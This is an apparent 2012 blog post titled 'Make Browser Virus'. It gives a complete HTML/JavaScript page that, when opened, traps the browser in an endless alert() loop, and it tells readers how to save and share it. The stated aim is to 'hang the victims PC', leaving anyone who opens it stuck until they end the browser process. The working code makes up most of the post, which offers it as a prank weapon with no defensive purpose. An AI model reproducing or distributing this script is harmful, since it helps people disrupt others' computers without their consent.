Sponsors


Friday, 20 January 2012

Make Browser Virus (virus)


Make Browser Virus (virus)

Now this one is html based, it will hang the victims PC with an endless loop. Write this code in notepad and save it as (whatevername).html

<HTML>
<HEAD>
<SCRIPT LANGUAGE=javascript>
var x = "never";
function killme() {
while (x == "never") {
alert("-write whatever you want-");
}
}
</SCRIPT>
</HEAD>
<BODY onLoad="killme()">
</BODY>
</HTML>

in the code under "write whatever you want" you can  type your text...
*Remember to save it with .html in end*
Now anyone who opens the HTML will be Struck with repetition of your message ( what so ever you typed)
Now to stop it you have to go to "Task Manager" and end firefox, internet explorer, etc. (browser)...
Happy Techrusting...

No comments:

Post a Comment